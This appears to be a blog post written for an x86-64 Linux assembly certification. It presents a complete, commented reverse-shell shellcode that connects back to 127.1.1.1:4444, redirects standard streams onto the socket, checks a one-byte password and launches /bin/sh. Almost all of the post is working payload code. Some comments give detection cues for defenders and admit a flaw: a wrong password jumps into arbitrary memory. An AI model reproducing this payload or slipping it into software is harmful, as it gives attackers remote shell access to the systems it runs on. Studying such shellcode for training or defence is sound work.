SLAE64 #2 - Revshell TCP shellcode

This shellcode is very similar to the Bindshell TCP shellcode, so please refer to it for the unique and interesting points. There is only 1 additional point I would like to make:

  1. Line 8/37: the listener uses 127.1.1.1 instead of 127.0.0.1, so the connect-back address contains no zero bytes and we are saved from having to nullify the 2 middle bytes at runtime.

Total size: 122 bytes

;-----------------------------------------------------------------------
; SLAE64 #2 - reverse-shell TCP shellcode
; Syntax: NASM (Intel).  Target: x86-64 Linux, raw `syscall` ABI
;         (rax = syscall number; args in rdi, rsi, rdx; result in rax).
; What the code below does, in order:
;   socket(AF_INET, SOCK_STREAM, 0)
;   connect(sock, &rev_data_struct, 16)      -> 127.1.1.1:4444
;   dup2(sock, 0); dup2(sock, 1); dup2(sock, 2)
;   read(sock, &rev_data_struct, 1)          -> one-byte "password", must be '|'
;   execve("/bin//sh", {"/bin//sh", NULL}, {NULL})
; Constraints the code relies on:
;   - No zero bytes: syscall numbers and small constants go through the
;     8-bit sub-registers (al, dil, sil, dl) on top of a zeroed register.
;   - rev_data_struct sits in .text and is written at run time (the
;     `sub byte [r8+1]` and the read() below), so the page holding this
;     code must be writable as well as executable. A W^X mapping would
;     fault on the first write; an RWX mapping is itself a detection cue.
;   - No error handling: each `mov al, N` only sets the low byte of rax
;     and assumes the previous syscall left a small non-negative value
;     there (fd / 0). After a failed call rax holds -errno and the next
;     syscall number is garbage.
; Observable chain for defenders: socket -> connect(loopback:4444) ->
;   three dup2() onto a socket -> execve of a shell with a double-slash
;   path; the dup2-to-socket-then-execve sequence is the usual
;   reverse-shell signature.
; Size: 122 bytes (author's figure; consistent with the encodings
;   counted at the jnz below).
;-----------------------------------------------------------------------
global _start

section .text

_start:

    ; Skip the 8 data bytes that follow: 2-byte short jmp + 8 bytes of data = `shell`.
    jmp $+10
    ; First 8 bytes of a struct sockaddr_in (sin_zero is not emitted):
    ;   sin_family = 0x0102  (AF_INET = 2 with a 0x01 high byte; fixed up below)
    ;   sin_port   = 0x115c  = htons(4444)
    ;   sin_addr   = 0x7f010101 = 127.1.1.1 (loopback address with no zero byte)
    rev_data_struct: db 0x02, 0x01, 0x11, 0x5c, 0x7f, 0x01, 0x01, 0x01


shell:

    ; store data struct address in r8 (RIP-relative, so position independent)
    lea r8, [rel rev_data_struct]

    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; syscall number 41

    xor rax, rax
    mov al, 41
    xor rdi, rdi
    mov dil, 2
    xor rsi, rsi
    mov sil, 1
    xor rdx, rdx                        ; protocol = 0; rdx stays 0 until `mov dl, 16` below
    syscall

    ; copy socket descriptor to rdi for future use
    ; (rdi keeps sock for connect() and the three dup2() calls; nothing else writes it)

    mov rdi, rax


    ; connect(sock, (struct sockaddr *)&server, 16), syscall number 42
    ; server.sin_family = AF_INET 
    ; server.sin_port = htons(PORT)
    ; server.sin_addr.s_addr = inet_addr("127.1.1.1")
    ; bzero(&server.sin_zero, 8)
    ; remove 0x1 by subtracting: sin_family 0x0102 -> 0x0002 (AF_INET) at run
    ; time, so no zero byte has to appear in the shellcode itself.
    ; This is a write into .text (see the header note on RWX).

    sub byte [r8+1], 0x1

    mov al, 42                          ; assumes socket() returned a small fd (upper bytes of rax zero)
    mov rsi, r8
    mov dl, 16                          ; addrlen 16, but only 8 bytes of data exist: bytes 8..15 are the
                                        ; first code bytes at `shell`, landing in the sin_zero slot, which
                                        ; is padding that connect() is not expected to interpret - confirm
    syscall


    ; duplicate sockets: dup2(sock, fd) for fd = 0, 1, 2 (syscall number 33).
    ; rdi still holds sock; rdx (16) is not used by dup2. Each `mov al, 33`
    ; relies on the previous syscall having returned a small non-negative
    ; value (connect() -> 0, dup2() -> the new fd).

    ; STDIN
    mov al, 33
    xor rsi, rsi
    syscall

    ; STDOUT
    mov al, 33
    mov sil, 1
    syscall

    ; STDERR
    mov al, 33
    mov sil, 2
    syscall

    ; read(sock, r8, 1), syscall number 0: read one byte from the socket and
    ; store it over the first byte of rev_data_struct (a second write into .text).
    xor rax, rax
    lea rsi, [r8]                       ; rsi = r8 (equivalent to mov rsi, r8)
    mov dl, 1                           ; count = 1 (rdx was 16)
    syscall

    ; check the byte just read against the expected password '|' (0x7C).
    ; On mismatch, `jnz $+44` jumps 44 bytes forward from the jnz itself. By
    ; instruction-size count the code after the jnz is 30 bytes, so the target
    ; is 12 bytes past the end of the 122-byte shellcode: it executes whatever
    ; happens to follow in memory, which is not guaranteed to fault.
    cmp byte [rsi], 0x7C
    jnz $+44

    ; execve("/bin//sh", argv, envp), syscall number 59.
    ; Stack built below, top (rsp) first, after all pushes:
    ;   [rsp+ 0] &"/bin//sh"   <- argv[0]            (rsi = rsp here)
    ;   [rsp+ 8] NULL          <- argv[1] / envp[0]  (rdx points here)
    ;   [rsp+16] "/bin//sh"    <- pathname bytes     (rdi points here)
    ;   [rsp+24] NULL          <- terminates the pathname string

    ; First NULL push - the terminator for the "/bin//sh" string pushed next

    xor rax, rax
    push rax

    ; push /bin//sh in reverse (little-endian qword "/bin//sh"; the doubled
    ; slash pads the path to exactly 8 bytes without needing a zero byte)

    mov rbx, 0x68732f2f6e69622f
    push rbx

    ; store /bin//sh address in RDI (execve pathname)

    mov rdi, rsp

    ; Second NULL push - becomes envp[0] and argv[1]
    push rax

    ; set RDX = envp = { NULL }
    mov rdx, rsp


    ; Push address of /bin//sh - argv[0]; the NULL pushed just above is argv[1]
    push rdi

    ; set RSI = argv

    mov rsi, rsp

    ; Call the Execve syscall
    mov al, 59                          ; rax is 0 from the xor above, so this yields exactly 59
    syscall

This blog post has (not) been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-XXXXX